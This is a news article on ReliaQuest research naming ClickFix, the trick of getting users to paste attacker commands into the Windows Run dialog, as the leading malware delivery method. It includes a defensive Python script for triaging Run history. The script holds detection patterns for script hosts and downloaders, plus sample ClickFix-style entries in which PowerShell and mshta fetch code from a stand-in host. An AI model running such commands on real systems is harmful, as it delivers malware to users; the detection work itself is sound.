
ClickFix Social Engineering Technique is the Leading Method for Malware Delivery

The ClickFix social engineering technique is the leading method of malware delivery, according to an analysis by researchers at ReliaQuest. The researchers analyzed cyberattacks between March 1 and March 31, 2026, and found that attackers were most commonly exploiting trusted identities, devices, and tools in their attacks. This approach allows the attackers to hide their activities, which resemble normal user behavior, and bypass traditional perimeter and file scanning defenses.

The leading technique was ClickFix, which involves tricking users into pasting the attacker’s commands and scripts into trusted system dialogs, such as the Windows Run dialog. Pressing Windows Key + R launches the Run dialog, and the user is convinced to paste the supplied code into the dialog and execute it, having been tricked into thinking that the command will resolve an IT issue.

For instance, a user visits a website that triggers a pop-up, warning them that their browser contains a vulnerability or an image failed to load. They are told to click a button, which copies code, and then paste that command into the Run dialog and press Enter, thus executing the command. Other methods involve generating a fake CAPTCHA page, informing the user that they need to complete the test to verify they are human by pasting and running the command. That command launches PowerShell code that delivers the malware payload.

ReliaQuest researchers report that this technique is commonly used to deliver the NetSupport RAT, a remote access Trojan, and Deepload fileless malware, although they observed this technique being used to deliver a range of malware variants. This approach has also been used against macOS users for the first time, delivering Atomic Stealer (AMOS), which can steal browser credentials, session cookies, cryptocurrency wallets, and keychain data.


ReliaQuest recommends that companies add this method of attack to their security awareness training programs and warn employees not to paste commands into dialog boxes, such as Run, Terminal, or Script Editor. Companies are also advised to consider restricting the use of the Run feature, restrict users from executing executable files, and use web filters to block pop-ups and prevent access to malicious websites.
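Because commands pasted into the Run dialog are recorded in the user's Run history, a defender can review that history for entries that match the pattern described above. The following triage script is an added example, not code from ReliaQuest or The HIPAA Journal; the indicator patterns, the function name, and the sample entries are assumptions constructed for illustration.

```python
import re

# Heuristics below are assumptions chosen for this example, not ReliaQuest's rules.
INTERPRETERS = re.compile(r"\b(powershell|pwsh|mshta|cmd|curl|msiexec)(\.exe)?\b", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "verification_lure": re.compile(r"captcha|not a robot|verif", re.I),
}

def triage_run_mru(values):
    """Return suspicious Run dialog entries, most recently used first."""
    # `values` maps value names to data, as exported from the per-user key
    # HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    order = values.get("MRUList", "")  # e.g. "dcba": leftmost letter is newest
    findings = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        # Each stored command carries a trailing "\1" marker; strip it.
        command = data[:-2] if data.endswith("\\1") else data
        if not INTERPRETERS.search(command):
            continue  # no script host or downloader named, e.g. a share path
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(command))
        if hits:
            recency = order.index(name) if name in order else len(order)
            findings.append({"value": name, "recency": recency,
                             "indicators": hits, "command": command})
    return sorted(findings, key=lambda f: f["recency"])

# Constructed sample export: two ordinary entries and two ClickFix-style ones.
# The URLs use the reserved .invalid domain and the payload is a placeholder.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\reports\\1",
    "c": 'powershell -w hidden -c "<placeholder> https://example.invalid/v" '
         "# I am not a robot - Verification ID 4821\\1",
    "d": "mshta https://example.invalid/check\\1",
}

if __name__ == "__main__":
    for f in triage_run_mru(SAMPLE_RUNMRU):
        print(f["recency"], f["indicators"], f["command"])
```

An entry that combines several indicators, such as a hidden window, a remote URL, and verification-themed text, deserves review first; a single indicator on its own can be legitimate administrator activity.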

Author: Steve Alder is the editor-in-chief of The HIPAA Journal. Steve is responsible for editorial policy regarding the topics covered in The HIPAA Journal. He is a specialist on healthcare industry legal and regulatory affairs, and has 10 years of experience writing about HIPAA and other related legal topics. Steve has developed a deep understanding of regulatory issues surrounding the use of information technology in the healthcare industry and has written hundreds of articles on HIPAA-related topics. Steve shapes the editorial policy of The HIPAA Journal, ensuring its comprehensive coverage of critical topics. Steve Alder is considered an authority in the healthcare industry on HIPAA. The HIPAA Journal has evolved into the leading independent authority on HIPAA under Steve’s editorial leadership. Steve manages a team of writers and is responsible for the factual and legal accuracy of all content published on The HIPAA Journal. Steve holds a Bachelor’s of Science degree from the University of Liverpool. You can connect with Steve via LinkedIn or email via stevealder(at)hipaajournal.com
